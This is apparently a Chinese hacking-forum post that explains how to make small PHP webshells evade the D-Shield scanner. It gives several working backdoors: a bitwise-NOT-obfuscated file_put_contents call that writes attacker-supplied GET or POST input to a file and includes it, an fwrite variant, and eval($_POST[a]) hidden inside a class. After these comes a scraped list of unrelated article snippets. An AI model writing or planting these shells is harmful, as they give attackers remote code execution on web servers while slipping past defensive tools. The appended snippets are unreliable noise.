PHP小马免杀的浅谈[过最新D盾]
PHP小马免杀的浅谈[过最新D盾]
- 绕过
- 思路1:使用写文件的函数写出另一个php文件然后include/require 回来执行
- 方法1:File_put_content
- 方法2 使用fwrite
- 思路2 防止被识别成可疑eval
- 方法1 用(class{}) 包裹起来
绕过
思路1:使用写文件的函数写出另一个php文件然后include/require 回来执行
方法1:File_put_content
D盾还是报了,但如果是PHP7.0以上的,还是有绕过方法滴:
<?php
/*
T00ls.net shadowwolf
2021-7-25
*/
( ~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('oagi.php','<?php '.$_GET[a].' ?>');include('oagi.php');
?>
注:使用GET仅是因为测试直观方便= =
完全可以改成POST来的:
<?php
/*
T00ls.net shadowwolf
2021-7-25
*/
( ~urldecode("%99%96%93%9A%A0%8F%8A%8B%A0%9C%90%91%8B%9A%91%8B%8C"))('oagi.php','<?php '.$_POST[a].' ?>');include('oagi.php');
?>
方法2 使用fwrite
同理 使用fwrite也是一样的
<?php
$file = fopen("oagi.php","w");
echo fwrite($file,"<?php ".$_POST[a].' ?>');
fclose($file);
?>
也是过D盾
思路2 防止被识别成可疑eval
方法1 用(class{}) 包裹起来
在function或者是直接用的eval会被识别成可疑eval
所以我们不在function或者是裸露的条件下如
<?php eval($_POST[a]);?>是十分重要的
所以我们用类来包裹
<?php
/*
T00ls.net
shadowwolf
2021-7-25
*/
error_reporting(0);
class a {public $command_;public function b($command){$command_=~$command;$command =~$command_;eval($command);}
}
$c=new a();
$c->b($_POST[a]);
?>
同样 也是过D盾的
暂时就这么多QAQ
PHP小马免杀的浅谈[过最新D盾]相关推荐
- 以马原的视角浅谈IP地址的发展——IPv4、IPv6、NAT
文章写的有点长,核心就是介绍IP地址的原理,以及NAT有好处也有坏处,IPv6相比较IPv4也是有好处和坏处,感兴趣的可以往最后划. 以马原的视角浅谈IP地址的发展--IPv4.IPv6.NAT IP ...
- 猿来小课Java视频教程讲师浅谈JAVA体系结构
猿来小课Java视频教程讲师:Java体系结构中不仅定义了Java的开发编译环境,也定义了Java的运行环境.为运行Java应用程序和applet,计算机上应安装JVM和Java运行时解释器,这两个部 ...
- 远控软件gh0st源码免杀之我谈
远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控木马,既然要利用,我们就做好源码基础上的木马免杀工作. 好久没有来博客了,我把免杀这部 ...
- mysql提权马免杀_WebShell-2/牛逼免杀提权隐藏大马.asp at master · SecWiki/WebShell-2 · GitHub...
UserPass="admin"'密码 '------------------------请勿用于非法途径---------------------- mmname="牛 ...
- 【uni-app小程序画报生成】浅谈lime-painter的使用
lime-painter 一款非常不错的 基于canvas的小程序画报生成工具,可惜因为各种问题,作者不再维护改为自用. 这里使用的是 ## 1.9.3.5(2022-06-29)版本,如果需要可以找 ...
- 微信小程序页面栈_浅谈下微信小程序中的路由(页面跳转、返回、刷新、页面栈)...
什么是小程序里的"路由"?路由器吗?蒙蔽?好吧,在WEB应用中它其实就是分组数据包从源到目的地时,决定端到端路径的网络范围的进程:在小程序里就是设置页面的跳转,返回,自动刷新等一些 ...
- 浅谈字节最新开源联邦机器学习平台Fedlearner
最近联邦机器学习越来越火,字节也正式对外宣讲开源了联邦机器学习平台Fedlearner.这次头条开源的Fedlearner与我之前分析过得华为.微众的联邦机器学习平台有什么不同呢?主要体现在以下几个方 ...
- PHP-Webshell免杀研究
不想当将军的士兵不是好士兵,不想getshell的Hacker不是好Hacker~ 有时候我们在做攻防对抗时经常会碰到可以上传webshell的地方,但是经常会被安全狗.D盾.护卫神.云锁等安全软件查 ...
- 加强计算机管理,浅谈如何加强高校计算机专业管理
摘要:为了使高校计算机专业实验室的管理和维护水平得以提高,让计算机专业实验室最大限度地发挥作用,该文从计算机专业实验室软硬件管理与维护.实验室管理制度.实验课程管理设置提出了一些改进措施,将有利于提高 ...
最新文章
- 什么是 Delta 文件
- Core Location和MapKit的一些简单使用
- Segment Routing — SRv6 — TE 流量工程
- 利用生物视觉机制提高神经网络的对抗鲁棒性 | NeurIPS 2020
- Confluence 6 使用 Apache 和 mod_proxy 添加 SSL和其他
- 开发一个自己的 CSS 框架(五)
- cesium-绘制点、线、面 - 基于Vue
- 在Git中找到破坏测试的提交
- anaconda虚拟环境python升级_使用Anaconda虚拟环境管理Python版本
- 链上合约(On-chain) 和 链下合约(Off-chain) 是什么 区别
- 68.x的平方根(力扣leetcode) 博主可答疑该问题
- 天玑9000和苹果a15哪个好
- 美团云品牌升级启用动态logo,传导云价值释放云红利
- mysql、mysqli、PDO
- 遗传算法基本简介及改进方向
- basler工业相机使用问题总结
- xp系统默认网卡服务器,电脑XP系统配置局域网提示无任何网络提供程序接受指定的网络路径的解决方法...
- js正则表达式实现千分位符
- 程序员 破解获取已连接过的WiFi密码
- python如何将多张图片批量插入PPT中?
热门文章
- 全球及中国细胞治疗产业应用前景与投资潜力建议报告2022-2028年
- 邮箱163登录入口?邮箱163注册格式是什么?
- 苹果的新技术3D Touch与以往的“长按屏幕”有何区别?
- 永久删除计算机文件怎么操作步骤,两种可以直接彻底删除文件的操作方法-电脑自学网...
- 【精】Verilog语言缩写规范
- android时间24小时,安卓时间显示TextClock显示日期时间,24小时制和12小时制(自定义...
- uniapp原生sdk插件极光短信·极光短信插件可快速对接收发短信·官方伙伴优雅草发布
- Windows--下载系统镜像
- MT7628路由器工作原理,MT7628处理器相关参数介绍
- nginx root 和alise